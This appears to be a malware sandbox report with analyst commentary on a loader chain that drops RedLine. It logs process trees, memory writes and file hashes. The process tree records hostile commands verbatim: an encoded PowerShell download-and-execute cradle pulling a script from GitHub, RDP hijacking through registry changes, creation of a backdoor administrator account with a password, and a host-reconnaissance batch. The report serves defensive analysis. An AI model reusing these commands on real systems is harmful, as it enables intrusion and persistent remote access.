Token: SeCreatePagefilePrivilege | 2264 | (not named in report)
Token: SeShutdownPrivilege | 2264 | (not named in report)
Token: SeCreatePagefilePrivilege | 2264 | (not named in report)
Token: SeDebugPrivilege | 876 | 8328.exe
3520 WMIC.exe, the following 21 tokens twice over (42 entries): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
492 WMIC.exe (17 entries): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
The WMIC.exe entries are WMIC's own start-up behaviour (it enables every privilege present in its token, including the four the sandbox could only report by LUID, 33 to 36) and say nothing about what the batch asked for. The entry that matters is SeDebugPrivilege enabled by 8328.exe, the RedLine payload, which needs it to open other processes' memory.
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
pid | process
2264 | (not named in report)
2264 | (not named in report)
968 | iexplore.exe

Suspicious use of SendNotifyMessage 3 IoCs
Processes:
pid | process
2264 | (not named in report)
2264 | (not named in report)
2264 | (not named in report)

Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
pid | process
968 | iexplore.exe
968 | iexplore.exe
1588 | IEXPLORE.EXE
1588 | IEXPLORE.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | entries
PID 2264 wrote to memory of 2208 3218.exe | 3
PID 2208 3218.exe wrote to memory of 896 SmartClock.exe | 3
PID 2264 wrote to memory of 1688 50CC.exe | 3
PID 2264 wrote to memory of 876 8328.exe | 3
PID 2264 wrote to memory of 2776 cmd.exe | 2
PID 2776 cmd.exe wrote to memory of 3520 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 492 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 1752 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 2848 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 3236 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 3876 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 1164 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 820 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 2888 WMIC.exe | 2
PID 2264 wrote to memory of 1312 CFF1.exe | 2
PID 2776 cmd.exe wrote to memory of 1316 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 2976 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 1728 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 3588 WMIC.exe | 2
PID 2776 cmd.exe wrote to memory of 1540 WMIC.exe | 2
PID 1312 CFF1.exe wrote to memory of 2836 powershell.exe | 2
PID 2776 cmd.exe wrote to memory of 736 ipconfig.exe | 2
PID 2836 powershell.exe wrote to memory of 3640 csc.exe | 2
PID 2776 cmd.exe wrote to memory of 2368 ROUTE.EXE | 2
PID 3640 csc.exe wrote to memory of 764 cvtres.exe | 2
PID 2776 cmd.exe wrote to memory of 504 netsh.exe | 2
PID 2776 cmd.exe wrote to memory of 1164 systeminfo.exe | 2
PID 2836 powershell.exe wrote to memory of 820 csc.exe | 2
PID 820 csc.exe wrote to memory of 2596 cvtres.exe | 2
PID 2836 powershell.exe wrote to memory of 968 powershell.exe | 2
Entries are listed in their original order, with consecutive duplicates collapsed into the entries column. Most of them are the ordinary parent-into-child writes that accompany process creation (cmd.exe into each WMIC.exe, csc.exe into cvtres.exe). What the list does establish is the shape of the chain: PID 2264, which the report never resolves to an image name, is the parent of 3218.exe, 50CC.exe, 8328.exe, CFF1.exe and of the cmd.exe fingerprinting batch, and it is also the process that "Deletes itself" above. CFF1.exe in turn launches powershell.exe (2836), which runs csc.exe twice, each followed by cvtres.exe, the footprint of Add-Type compiling inline C# at run time, and then a child powershell.exe. Note the PID reuse within the run (1164 is both a WMIC.exe and systeminfo.exe, 820 both a WMIC.exe and csc.exe, 2368 both the sample and ROUTE.EXE): correlate on PID plus start time, not PID alone.
outlook_office_path 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe

outlook_win_path 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Processes
Each process is shown as image path, then its command line; children are indented under their parent. The dropped payloads and the cmd.exe batch appear at the top level because their parent, PID 2264, is not named in the report (see "Suspicious use of WriteProcessMemory").

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca

C:\Windows\system32\DllHost.exe
    cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    C:\Windows\system32\WerFault.exe
        cmdline: C:\Windows\system32\WerFault.exe -u -p 3836 -s 916
        - Program crash

C:\Windows\System32\RuntimeBroker.exe
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

c:\windows\system32\taskhostw.exe
    cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

c:\windows\system32\svchost.exe
    cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc

c:\windows\system32\sihost.exe
    cmdline: sihost.exe

C:\Users\Admin\AppData\Local\Temp\d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Local\Temp\3218.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\3218.exe
    - Executes dropped EXE
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
        cmdline: "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
        - Executes dropped EXE
        - Suspicious behavior: AddClipboardFormatListener

C:\Users\Admin\AppData\Local\Temp\50CC.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\50CC.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

C:\Windows\system32\backgroundTaskHost.exe
    cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca

C:\Users\Admin\AppData\Local\Temp\8328.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\8328.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\cmd.exe
    cmdline: cmd
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
    C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
    C:\Windows\system32\ipconfig.exe
        cmdline: ipconfig /displaydns
        - Gathers network information
    C:\Windows\system32\ROUTE.EXE
        cmdline: route print
    C:\Windows\system32\netsh.exe
        cmdline: netsh firewall show state
    C:\Windows\system32\systeminfo.exe
        cmdline: systeminfo
        - Gathers system information
    C:\Windows\system32\tasklist.exe
        cmdline: tasklist /v
        - Enumerates processes with tasklist
    C:\Windows\system32\net.exe
        cmdline: net accounts /domain
        C:\Windows\system32\net1.exe
            cmdline: C:\Windows\system32\net1 accounts /domain
    C:\Windows\system32\net.exe
        cmdline: net share
        C:\Windows\system32\net1.exe
            cmdline: C:\Windows\system32\net1 share

The cmd.exe subtree is a single host-fingerprinting script: installed security products from root\SecurityCenter2, then CPU, installed software, physical network adapters, startup entries, OS details, running processes, volumes, local accounts and group membership, and the PnP devices of class {50dd5230-ba8a-11d1-bf5d-0000f805f530}, the SmartCardReader setup class, followed by the DNS cache, routing table, firewall state, systeminfo, tasklist and the domain account policy and share list. Every command writes CSV to stdout, which is what a loader collects and uploads to pick the next payload; none of these commands is malicious on its own, so detection has to key on the combination under one parent.
-
C:\Windows\system32\net.exenet user2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user3⤵
-
C:\Windows\system32\net.exenet user /domain2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /domain3⤵
-
C:\Windows\system32\net.exenet use2⤵
-
C:\Windows\system32\net.exenet group2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 group3⤵
-
C:\Windows\system32\net.exenet localgroup2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup3⤵
-
C:\Windows\system32\NETSTAT.EXEnetstat -r2⤵
- Gathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\system32\route.exe" print3⤵
-
C:\Windows\system32\ROUTE.EXEC:\Windows\system32\route.exe print4⤵
-
C:\Windows\system32\NETSTAT.EXEnetstat -nao2⤵
- Gathers network information
-
C:\Windows\system32\schtasks.exeschtasks /query2⤵
-
C:\Windows\system32\ipconfig.exeipconfig /all2⤵
- Gathers network information
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Users\Admin\AppData\Local\Temp\CFF1.exeC:\Users\Admin\AppData\Local\Temp\CFF1.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j34tpabi\j34tpabi.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE693.tmp" "c:\Users\Admin\AppData\Local\Temp\j34tpabi\CSCEB51A9D4AFF540DABFBC18CA516ABF70.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5tjutfif\5tjutfif.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECAE.tmp" "c:\Users\Admin\AppData\Local\Temp\5tjutfif\CSC2710EE9381743C0894EAD7FF9DBB1B.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
-
C:\Windows\system32\net.exenet start rdpdr5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:968 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc VQXOunWs /add1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc VQXOunWs /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc VQXOunWs /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc VQXOunWs1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc VQXOunWs2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc VQXOunWs3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\3218.exe
MD5 382b71b055326ddbb723e7d335540dd4
SHA1 2c6dd50491f459441c2b7ec8bc8815b7808d1b2f
SHA256 25c411b5b3f3725c0552da227012255c91078b019160f64b98338ccd99b053ea
SHA512 1342509a3e87ae210916b394a1dc6f118b302e849e70603cda8b711a596e13e0d2715cf55e5c996080482ae071f358c1414c49982482409d7f50f18413fe2f5f
-
C:\Users\Admin\AppData\Local\Temp\50CC.exe
MD5 7bffbdad938e5cab5eca0012ce1a67e3
SHA1 f544f516f5855e3c26c81d4adea4295bd2ab1dca
SHA256 96701798fd053c9b597459a94d5216a7381a195191c13bd3c79eb972636319ca
SHA512 a98b0aa274b0ddcbf58f31a149fcaaba298919a17784071579acbc218d71b7b9f0ae5d802afe3d2ba9f01c9b8faebede45a17f88d19a7c262088578111960788
-
C:\Users\Admin\AppData\Local\Temp\5tjutfif\5tjutfif.dll
MD5 03a121865002a523266e5a8d2968eca4
SHA1 4469fe9be1e8f4d5c7fccb24fa029a3d1d8a1d2b
SHA256 76b4d4d54c34c2ddec220a5002e5084c10131588737c6f8de81100c3ce22d689
SHA512 40522ad9790feadfc7da811032fa00e40a70dad27e069a5d961eef08bd529537beab15982a962f3513e09edb0f5efcf8defd9a084b8c1713304ca72521160765
-
C:\Users\Admin\AppData\Local\Temp\8328.exe
MD5 3907798e2cb7c0ceae0af30013311467
SHA1 4e300357564703c96702d786a0abd01d5818e3a5
SHA256 921dfc7cfaa1c4f07629465e0f18bed116927ab494bee8beae6a3ec6cfc62c8d
SHA512 d1b292565908e0b91a9f8750043eacc4bd8b5a9bd5d3dbec4e93b37d6dce96ed3f4236808efb9b53c2bcabb1952495f8e2c73679fc19455a5866a136424c94ff
-
C:\Users\Admin\AppData\Local\Temp\CFF1.exe
MD5 7faddf1721f8f471bcbbd735e4032e1a
SHA1 9e1aadf3e0cd2642365599236e2dd9eaf1ab9aa9
SHA256 4a6a29e358327ac53ec209cfa4e32d73286413bdeaa2da4c80b8109b7906de5c
SHA512 cf55867f2995be8ae4c6083bd9d1972630f4ab2435f65918ca9510d356c64a3b043fdc90d0ccc4c03c0144bcbd70c8bf01ede271c9b0663bd2ae9f8c0e7ccc53
-
C:\Users\Admin\AppData\Local\Temp\RESE693.tmp
MD5 19f86cbb79e193910ee011eb92918b9b
SHA1 1997773ec5b6183e3bafe3646fa7ae654680c161
SHA256 ec8b3eb9f6671efb5a143cafc4f579d67072194dfd8a700192fb658940d68cc2
SHA512 bf66047ddd974e494d3ec47fe23a5cb338b7cf5c09afa2a8d04b94a49743951375b6e925621275d792eeea7ac84f115801136d444dd0043ed95c020f5e3cc17c
-
C:\Users\Admin\AppData\Local\Temp\RESECAE.tmp
MD5 66cbc8e8e056e05f07a2eb5f392bd762
SHA1 852879365dd644a0a88763ee0e44d8a316845e0b
SHA256 91e45c256bbb7fe0bc39df3d75867f45b7932dd4fc1d5b741afc89e41f08a5a1
SHA512 fabaf35bdfc0f39aa80ae03dbf56e91964114ec48fb30f6f856539d50257e734e971e22bf9953340adc1393c2e98e7f54fd2408d3d78398a50a3f5ad1f08278b
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
MD5 df87d6d93b1ec74fc876c6b46e408d37
SHA1 1ba00c449d9132e6a481a98c5c98654c49e41352
SHA256 25fc99f93932f10299fbe3b9ee2cad331f9d6ada033e6ade943b8d779f4dfe7d
SHA512 130990d37a35a53e361a8f973b0e952dbd00763f3b8dbcc4fc83998b064e7433ee6256fc321c230ddcd6c166f3562e40b16c91f2a3d74775534b59075c10a692
-
C:\Users\Admin\AppData\Local\Temp\j34tpabi\j34tpabi.dll
MD5 3d3a9c7c269cd56e0836cc7a1cbb7dd6
SHA1 9090cc93f0f9526f732ed2dd3aac4eb1be695bd5
SHA256 bff83d5554a677a51ab2ea5ddcf28a92fbc9449853d4dc28aff8544b6bb2f24f
SHA512 8937ea72c8cb9f449a974f5582591368c0c30dd216a987c23469a6aa81affb6dd5e0cfe347bc2ce9980a8ef961ecdbe772ebaef93ed3624b14dc1c1055e82759
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
MD5 382b71b055326ddbb723e7d335540dd4
SHA1 2c6dd50491f459441c2b7ec8bc8815b7808d1b2f
SHA256 25c411b5b3f3725c0552da227012255c91078b019160f64b98338ccd99b053ea
SHA512 1342509a3e87ae210916b394a1dc6f118b302e849e70603cda8b711a596e13e0d2715cf55e5c996080482ae071f358c1414c49982482409d7f50f18413fe2f5f
-
\??\c:\Users\Admin\AppData\Local\Temp\5tjutfif\5tjutfif.0.cs
MD5 e0f116150ceec4ea8bb954d973e3b649
SHA1 86a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256 511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA512 32f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\5tjutfif\5tjutfif.cmdline
MD5 0b0565fd5e4576a25c2160529cdc336b
SHA1 f4dc814d682aa5e3490f08de66ffc65877d61a70
SHA256 3a88ac28acd8a5c5d4f1b776bfc56ddff59c5389025d59a1fcc0f85d74d99153
SHA512 17a63762cf2bf9f6dd4ae5d990130495edeffd3ec19219c40c3b3fe5e47dcf1b52f47bb501886a8dab7f21def2812aa33284a2831daeec5f37dbd63e94eb77f5
-
\??\c:\Users\Admin\AppData\Local\Temp\5tjutfif\CSC2710EE9381743C0894EAD7FF9DBB1B.TMP
MD5 01f92f149e1803b7b3d22f8e1fdab117
SHA1 ce70ab277de067ac1324e52feebac6d54a9a6bbe
SHA256 19a3f189468062befeba181a18755c4034af5b5ea2c7fb85873c4ba5f2c8be14
SHA512 6a3cbf1807771455d189c705922aace00568c8d289e26fb456713f50684c8d3ebed8a7aca704bb9beae7385dff57300416e1df0a53daeb411ade3d1eda1efb06
-
